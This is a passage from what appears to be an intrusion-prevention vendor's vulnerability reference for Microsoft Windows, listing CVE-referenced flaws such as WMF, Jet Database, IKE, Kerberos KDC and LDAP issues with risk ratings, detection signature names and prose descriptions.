There exists a denial of service vulnerability in the Graphics Rendering Engine (GRE) component of Microsoft Windows. The vulnerability is created by an error in parsing certain Windows Metafile (WMF) files. An attacker can exploit this vulnerability to cause the executing program to terminate via a crafted WMF file. An successful attack exploiting this vulnerability can cause the vulnerable application that opens the malicious WMF file to terminate. Some versions of the Windows Explorer and the Windows picture and fax viewer are the most likely affected applications.

Situation:

File-Binary_Microsoft-Windows-GRE-WMF-Handling-Memory-Read-Exception

References:

CVE-2006-0143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0143

BID-16167
http://www.securityfocus.com/bid/16167

Microsoft-Windows-HLP-File-Handling-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Windows. The vulnerability is due to a boundary error while handling specially crafted Windows Help (HLP) files. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious HLP file that would trigger a heap-based buffer overflow condition. Successful exploitation may allow arbitrary code injection and execution with the privileges of the currently logged-in user. In an attack case where code injection is not successful, all instances of the vulnerable application will terminate or stop responding. In a more sophisticated attack, where code injection is successful, the behaviour of the target system is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.

Situation:

File-Binary_Microsoft-Windows-HLP-File-Handling-Heap-Buffer-Overflow

References:

CVE-2007-1912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1912

BID-23382
http://www.securityfocus.com/bid/23382

Microsoft-Windows-HTTP.sys-DoS-CVE-2022-35748

About this vulnerability:

A vulnerability in Microsoft Windows HTTP Protocol Stack

Risk:

High

First detected in:

sgpkg-ips-1491-5242

Last changed:

sgpkg-ips-1491-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in the parsing of a Server Name Indication (SNI) in the HTTP Protocol Stack (HTTP.sys) on a Windows Server enables an unauthenticated attacker to cause a denial of service (DOS).

Situation:

HTTPS_CS-Microsoft-Windows-HTTP.sys-DoS-CVE-2022-35748

References:

CVE-2022-35748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35748

ms22-aug
http://technet.microsoft.com/security/bulletin/ms22-aug

Microsoft-Windows-IKE-Ikeinitmmresponderphase1-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1595-5242

Last changed:

sgpkg-ips-1595-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A NULL pointer dereference vulnerability has been reported in the Windows IKE extensions. The vulnerability is due to improper handling of incoming packets when IPsec is enabled on the machine. A remote attacker could exploit this vulnerability by sending a crafted Vendor ID payload to a target server. Successful exploitation results in denial of service conditions on the target server.

Situation:

Generic_UDP-Microsoft-Windows-IKE-Ikeinitmmresponderphase1-Null-Pointer-Dereference

References:

CVE-2023-21758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21758

ms23-jan
http://technet.microsoft.com/security/bulletin/ms23-jan

Microsoft-Windows-IKE-Vendor-Id-CVE-2023-21547-Null-Pointer-Dereference

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1591-5242

Last changed:

sgpkg-ips-1594-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Situation:

Generic_UDP-Microsoft-Windows-IKE-Vendor-Id-CVE-2023-21547-Null-Pointer-Dereference

References:

CVE-2023-21547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21547

ms23-jan
http://technet.microsoft.com/security/bulletin/ms23-jan

Microsoft-Windows-Image-ICC-Profile-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1104-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Improper parsing of ICC profile data in image files causes a code execution vulnerability in Microsoft Windows.

Situation:

File-Binary_Microsoft-Windows-Image-ICC-Profile-Code-Execution
File-JPEG_Microsoft-Windows-Image-ICC-Profile-Code-Execution
File-PNG_Microsoft-Windows-Image-ICC-Profile-Code-Execution

References:

CVE-2018-8475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8475

Microsoft-Windows-Imaging-API-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1202-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a use after free vulnerability in the Microsoft Windows Imaging API. A malicious file must be opened to exploit the vulnerability. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Binary_Microsoft-Windows-Imaging-API-Use-After-Free

References:

CVE-2019-1311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1311

Microsoft-Windows-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-413-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An insecure library loading vulnerability has been reported in Microsoft Windows. The vulnerability is due to a design weakness exhibited during DLL loading. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted file from an SMB or a WebDAV share. A successful attack could result in the execution of arbitrary code in the security context of the target user.

Situation:

HTTP_CSU-Microsoft-Windows-Insecure-Library-Loading
SMB-TCP_Microsoft-Windows-Insecure-Library-Loading

References:

CVE-2011-1991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1991

BID-47741
http://www.securityfocus.com/bid/47741

MS11-071
http://technet.microsoft.com/security/bulletin/MS11-071

Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519

About this vulnerability:

A vulnerability in Microsoft Windows .NET

Risk:

Moderate

First detected in:

sgpkg-ips-491-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

There is a vulnerability in Microsoft .NET Framework.

Situation:

HTTP_CSU-Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519
SMB-TCP_Microsoft-Windows-Insecure-Library-Loading-CVE-2012-2519

References:

CVE-2012-2519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2519

MS12-074
http://technet.microsoft.com/security/bulletin/MS12-074

Microsoft-Windows-Integer-Underflow-CVE-2015-6130

About this vulnerability:

A vulnerability in Windows

Risk:

High

First detected in:

sgpkg-ips-711-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 2008 R2

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows.

Situation:

File-Binary_Microsoft-Windows-Integer-Underflow-CVE-2015-6130

References:

CVE-2015-6130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6130

MS15-130
http://technet.microsoft.com/security/bulletin/MS15-130

Microsoft-Windows-Internet-Key-Exchange-Protocol-Extensions-Denial-of-Service

About this vulnerability:

A vulnerability in the Windows IKE extensions.

Risk:

High

First detected in:

sgpkg-ips-1532-5242

Last changed:

sgpkg-ips-1532-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in the Windows IKE extensions, multiple Windows versions, which allows remote attackers to create a denail of service condition on the target server by sending a crafted ISAKMP packet, due to improper handling of incoming packets when IPsec is enabled on the machine.

Situation:

Generic_UDP-Microsoft-Windows-Internet-Key-Exchange-Protocol-Extensions-Denial-of-Service

References:

CVE-2022-34720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34720

Microsoft-Windows-Internet-Printing-Service-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in Microsoft Windows Internet Printing. The flaw is due to insufficient input validation of print server responses. Remote authenticated attackers can exploit this vulnerability by sending specially crafted messages to the affected interface. A successful exploitation can lead to arbitrary code execution with System level privileges. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected IIS process. In an attack case where code injection is not successful, the IIS process will terminate abnormally, in most case it will restart automatically to resume normal operation.

Situation:

SMB-TCP_Microsoft-Windows-Internet-Printing-Service-Integer-Overflow

References:

CVE-2008-1446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1446

BID-31682
http://www.securityfocus.com/bid/31682

MS08-062
http://technet.microsoft.com/security/bulletin/MS08-062

Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1757-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Maliciously crafted Internet Shortcut files that point to a Control Panel file can bypass the Microsoft Defender SmartScreen security warning dialog.

Situation:

File-Text_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025
File-Text_Suspicious-Internet-Shortcut-File
File-TextId_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025
File-TextId_Suspicious-Internet-Shortcut-File

References:

CVE-2023-36025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36025

ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov

Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1757-5242

Last changed:

sgpkg-ips-1757-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Maliciously crafted Internet Shortcut files that point to another shortcut file can bypass the Microsoft Defender SmartScreen security warning dialog.

Situation:

File-Text_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412
File-TextId_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412

References:

CVE-2024-21412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21412

ms24-feb
http://technet.microsoft.com/security/bulletin/ms24-feb

Microsoft-Windows-IP-Validation-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability exists in the Microsoft Windows operating systems' processing of IP (Internet Protocol) packets. The affected systems do not perform sufficient validation on IP options fields. This flaw may allow an unauthenticated attacker to cause a denial of service, or inject and execute arbitrary code on the target system. The vulnerable target system will shut down as a result of a successful denial of service attack targeting this vulnerability. In a successful code injection and execution attack, the target system will execute attacker supplied code at the system privilege level. The behaviour of the target system in such a case is dependant on the intention of the injected code.

Situation:

IP_Option-Too-Long

References:

CVE-2005-0048
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0048

BID-13116
http://www.securityfocus.com/bid/13116

MS05-019
http://technet.microsoft.com/security/bulletin/MS05-019

Microsoft-Windows-IPv6-DoS-Vulnerability-CVE-2014-0254

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-564-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows

Situation:

IPv6_Microsoft-Windows-IPv6-DoS-Vulnerability-CVE-2014-0254

References:

CVE-2014-0254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0254

MS14-006
http://technet.microsoft.com/security/bulletin/MS14-006

Microsoft-Windows-IPv6-Router-Advertisement-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-413-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Microsoft Windows TCP/IP stack. The vulnerability is due to insufficient bounds checking when handling incoming IPv6 Router Advertisement packets. This vulnerability may be exploited by remote unauthenticated attackers by sending specially crafted packets to the affected host. In attack scenarios where code execution is successful the behaviour of the target machine is completely dependent on the intention of the injected code, which will run in the kernel security context. In cases where code execution is not successful the affected product may terminate abnormally to cause a deny of service condition.

Situation:

IP_Length-Inconsistency
IPv6_Microsoft-Windows-IPv6-Router-Advertisement-Stack-Buffer-Overflow

References:

CVE-2010-0239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0239

MS10-009
http://technet.microsoft.com/security/bulletin/MS10-009

Microsoft-Windows-iSCSI-Target-CVE-2014-0255-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

High

First detected in:

sgpkg-ips-587-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

<os>

Type:

Resource Starvation

Description:

A denial-of-service vulnerability exists in Microsoft Windows Servers where the iSCSI target role is enabled. The vulnerability is due to memory exhaustion when handling iSCSI packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a large number of specially crafted iSCSI packets to the server. Successful exploitation could lead to a denial-of-service condition.

Situation:

Generic_CS-iSCSI-Login-Request

References:

CVE-2014-0255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0255

OSVDB-106897
http://www.osvdb.org/106897

MS14-028
http://technet.microsoft.com/security/bulletin/MS14-028

Microsoft-Windows-ITS-Protocol-Information-Disclosure-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1029-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Improper parsing of the InfoTech Storage (ITS) protocol requests causes an information disclosure vulnerability in Windows. A successful exploit allows an attacker to gain access to NTLM and other information.

Situation:

File-Text_Microsoft-Windows-ITS-Protocol-Information-Disclosure-Vulnerability

References:

CVE-2017-11927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11927

Microsoft-Windows-Itss.dll-CHM-File-Handling-Heap-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-421-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in the Microsoft Windows Infotech Storage Library. The flaw is created due to a lack of verification of a user supplied value, before using it as the size argument in a memory allocation call. Exploitation of this flaw may result in process flow diversion of the vulnerable application. In an attack case where code injection is not successful, the vulnerable application using the affected library will terminate immediately. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.

Situation:

File-Binary_Microsoft-Windows-Itss.dll-CHM-File-Handling-Heap-Corruption

References:

CVE-2006-2297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2297

BID-17926
http://www.securityfocus.com/bid/17926

OSVDB-25501
http://www.osvdb.org/25501

Microsoft-Windows-Jet-Database-CVE-2019-0891-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1190-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A vulnerability in the Jet Database Engine component of Microsoft Windows which allows remote attackers to execute arbitrary code by enticing a user to open a specially crafted file, due to the improper handling of objects in memory.

Situation:

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-0891-Remote-Code-Execution

References:

CVE-2019-0891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0891

Microsoft-Windows-Jet-Database-CVE-2019-1242-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1189-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A vulnerability in the Jet Database Engine component of Microsoft Windows which allows remote attackers to execute arbitrary code by sending a target user a crafted file, due to the improper handling of objects in memory.

Situation:

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1242-Remote-Code-Execution

References:

CVE-2019-1242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1242

Microsoft-Windows-Jet-Database-CVE-2019-1243-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1192-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in the Jet Database Engine component of Microsoft Windows. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1243-Remote-Code-Execution

References:

CVE-2019-1243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1243

Microsoft-Windows-Jet-Database-CVE-2019-1249-RCE

About this vulnerability:

A vulnerability in Microsoft Windows Jet Database Engine.

Risk:

High

First detected in:

sgpkg-ips-1371-5242

Last changed:

sgpkg-ips-1371-5242

Platform:

Windows

Software:

Jet Database Engine

Type:

Input Validation

Description:

A vulnerability in the Jet Database Engine component of Microsoft Windows which allows remote attackers to execute arbitrary code by sending a crafted file to the target user, due to improper handling of objects in memory.

Situation:

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1249-RCE

References:

CVE-2019-1249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1249

Microsoft-Windows-Jet-Database-CVE-2019-1250-RCE

About this vulnerability:

A vulnerability in Microsoft Windows Jet Database Engine.

Risk:

High

First detected in:

sgpkg-ips-1372-5242

Last changed:

sgpkg-ips-1372-5242

Platform:

Windows

Software:

Jet Database Engine

Type:

Input Validation

Description:

Situation:

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1250-RCE

References:

CVE-2019-1250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1250

Microsoft-Windows-Jet-Database-CVE-2019-1358-RCE

About this vulnerability:

A vulnerability in Microsoft Windows Jet Database Engine.

Risk:

High

First detected in:

sgpkg-ips-1372-5242

Last changed:

sgpkg-ips-1372-5242

Platform:

Windows

Software:

Jet Database Engine

Type:

Input Validation

Description:

Situation:

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1358-RCE

References:

CVE-2019-1358
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1358

Microsoft-Windows-Jet-Database-CVE-2019-1359-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Microsoft Windows Jet Database Engine.

Risk:

High

First detected in:

sgpkg-ips-1372-5242

Last changed:

sgpkg-ips-1372-5242

Platform:

Windows

Software:

Jet Database Engine

Type:

Malfunction

Description:

Situation:

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1359-Out-Of-Bounds-Write

References:

CVE-2019-1359
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1359

Microsoft-Windows-Jet-Database-CVE-2019-1406-Off-By-One

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1255-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Improper handling of Jet database files causes an off by one vulnerability in Windows. A successful exploit may allow an attacker to execute code on the target system.

Situation:

File-Binary_Microsoft-Windows-Jet-Database-CVE-2019-1406-Off-By-One

References:

CVE-2019-1406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1406

Microsoft-Windows-Jet-Database-Engine-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1107-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Improper parsing of fields within an MDB database file causes a code execution vulnerability in Microsoft Jet Database Engine. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-Binary_Microsoft-Windows-Jet-Database-Engine-Code-Execution

References:

CVE-2018-8423
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8423

Microsoft-Windows-Jet-Database-Engine-Createlvsmlocs-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A type confusion vulnerability has been reported in the Microsoft JET Database Engine components. The vulnerability is due to improper parsing of a database table. A remote, unauthenticated attacker can exploit the vulnerability by enticing a user to open a specially crafted JET database file while using an affected version of Microsoft Windows. Successful exploitation results in arbitrary code execution under the context of the process.

Situation:

File-Binary_Microsoft-Windows-Jet-Database-Engine-Createlvsmlocs-Code-Execution

References:

CVE-2019-0577
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0577

Microsoft-Windows-Jet-Database-Engine-CVE-2020-1074-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1294-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A remote code execution vulnerability have been reported in Microsoft Windows Jet Database Engine. The vulnerability is due to improper handling of objects in memory. A remote attacker could exploit this vulnerabilities by enticing a user to open a specially crafted file or visit a malicious website. Successful exploitation results in the execution of arbitrary code in the security context of the target user.

Situation:

File-Binary_Microsoft-Windows-Jet-Database-Engine-CVE-2020-1074-Remote-Code-Execution

References:

CVE-2020-1074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1074

ms20-sep
http://technet.microsoft.com/security/bulletin/ms20-sep

Microsoft-Windows-Jet-Database-Engine-Physical-Index-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An out-of-bounds read vulnerability has been reported in the Microsoft JET Database Engine components. The vulnerability is due to improper parsing of the physical index count field of a database table. A remote, unauthenticated attacker can exploit the vulnerability by enticing a user to open a specially crafted JET database file while using an affected version of Microsoft Windows. Successful exploitation of this vulnerability could result in disclosure of sensitive information.

Situation:

File-Binary_Microsoft-Windows-Jet-Database-Engine-Physical-Index-Out-Of-Bounds-Read

References:

CVE-2019-0575
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0575

Microsoft-Windows-KDC-Proxy-KpsSocketRecvDataIoCompletion-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows KDC Proxy

Risk:

High

First detected in:

sgpkg-ips-1841-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Windows

Software:

Microsoft Windows KDC Proxy

Type:

Integer Overflow

Description:

A vulnerability in Microsoft Windows KDC Proxy, in multiple version of Microsoft Windows Server, which allows remote attackers to direct a KDC proxy to forward a Kerberos request to a server under their control, initiating a crafted Kerberos response, which could lead to arbitary code excution on the target machine.

Situation:

Generic_SS-Microsoft-Windows-KDC-Proxy-KpsSocketRecvDataIoCompletion-Integer-Overflow

References:

CVE-2024-43639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43639

Microsoft-Windows-Kerberos-KDC-Privilege-Escalation

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-623-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows 8.1; Windows Vista; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

<os>

Type:

Malfunction

Description:

A privilege escalation vulnerability exists in implementations of Kerberos KDC in Microsoft Windows. The vulnerability is due to a failure to properly validate signatures allowing certain aspects of a Kerberos service ticket to be forged. An attacker with valid domain credentials can exploit this vulnerability to gain domain administrator privileges, which can be used to further compromise any computer in the domain including domain controllers.

Situation:

Generic_CS-Microsoft-Windows-Kerberos-KDC-Privilege-Escalation

References:

CVE-2014-6324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6324

OSVDB-114751
http://www.osvdb.org/114751

MS14-068
http://technet.microsoft.com/security/bulletin/MS14-068

Microsoft-Windows-Kernel-SMB2-DOS

About this vulnerability:

Denial of Service condition in Windows Kernel SMB2

Risk:

High

First detected in:

sgpkg-ips-266-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a Denial of Service condition in the Windows Kernel SMB2 handling.

Situation:

NetBIOS-TCP_SMB2-Windows-Kernel-DOS

References:

CVE-2009-3676
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3676

MS10-020
http://technet.microsoft.com/security/bulletin/MS10-020

Microsoft-Windows-Kodak-Image-Viewer-Code-Execution

About this vulnerability:

A buffer overflow vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-129-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP4; Windows XP SP2; Windows 2003 SP1; Windows 2003 SP2

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Windows Kodak Image Viewer. The vulnerability is due to improper parsing of specially crafted TIFF image files. An attacker can exploit the vulnerability by constructing a specially crafted image and enticing a victim to open the malicious image with an affected version of product. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the logged-in user.

Situation:

E-Mail_BS-Microsoft-Windows-Kodak-Image-Viewer-Code-Execution
HTTP_SS-Microsoft-Windows-Kodak-Image-Viewer-Code-Execution
File-Binary_Microsoft-Windows-Kodak-Image-Viewer-Code-Execution

References:

CVE-2007-2217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2217

BID-25909
http://www.securityfocus.com/bid/25909

MS07-055
http://technet.microsoft.com/security/bulletin/MS07-055

Microsoft-Windows-Lanman-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in Microsoft Windows Lanman service

Risk:

Low

First detected in:

sgpkg-ips-92-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2

Software:

<os>

Type:

Resource Starvation

Description:

There is a denial of service vulnerability in Microsoft Windows Lanman service. A flood of invalid packets can lead to excessive memory and processor usage.

Situation:

NetBIOS-TCP_Microsoft-Windows-Lanman-Denial-Of-Service

References:

CVE-2002-0597
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0597

BID-4532
http://www.securityfocus.com/bid/4532

OSVDB-5179
http://www.osvdb.org/5179

Microsoft-Windows-LDAP-Remote-Code-Execution-Vulnerability-CVE-2025-21376

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1835-5242

Last changed:

sgpkg-ips-1835-5242

Platform:

Windows

Software:

Windows Server

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Windows Server due to the handling of Lightweight Directory Access Protocol (LDAP) requests.

Situation:

LDAP_CS-Microsoft-Windows-LDAP-Remote-Code-Execution-Vulnerability-CVE-2025-21376

References:

CVE-2025-21376
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21376

ms25-feb
http://technet.microsoft.com/security/bulletin/ms25-feb

Microsoft-Windows-LDAP-Searchresultdone-Integer-Overflow-CVE-2024-49112

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Critical

First detected in:

sgpkg-ips-1841-5242

Last changed:

sgpkg-ips-1841-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in implementation of the Lightweight Directory Access Protocol (LDAP) in Microsoft Windows. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted RPC calls to the LDAP server, triggering a lookup of the attacker's domain. Successful exploitation could result in execution of arbitrary code in the context of the vulnerable service.

Situation:

LDAP_SS-Microsoft-Windows-LDAP-Searchresultdone-Integer-Overflow-CVE-2024-49112

References:

CVE-2024-49112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49112

ms24-dec
http://technet.microsoft.com/security/bulletin/ms24-dec

Microsoft-Windows-Libarchive-Execute_Filter_e8-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1720-5242

Last changed:

sgpkg-ips-1720-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in the Libarchive library included in Microsoft Windows. The vulnerability is due to insufficient bounds checks on the block length of a RARVM filter used for Intel E8 preprocessing, included in the compressed data of a RAR archive. A remote attacker could exploit this vulnerability by enticing a target user into extracting a crafted RAR archive. Successful exploitation could result in arbitrary code execution in the context of the application using the vulnerable library.

Situation:

File-Binary_Microsoft-Windows-Libarchive-Execute_Filter_e8-Integer-Overflow

References:

CVE-2024-20697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20697

ms24-jan
http://technet.microsoft.com/security/bulletin/ms24-jan

Microsoft-Windows-Libarchive-Run_Filters-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1720-5242

Last changed:

sgpkg-ips-1720-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability has been reported for the Libarchive library included in Microsoft Windows. The vulnerability is due to insufficient bounds checks on the block length of a RARVM filter, included in the compressed data of a RAR archive. A remote attacker could exploit this vulnerability by enticing a target user into extracting a crafted RAR archive. Successful exploitation could result in arbitrary code execution in the context of the application using the vulnerable library.
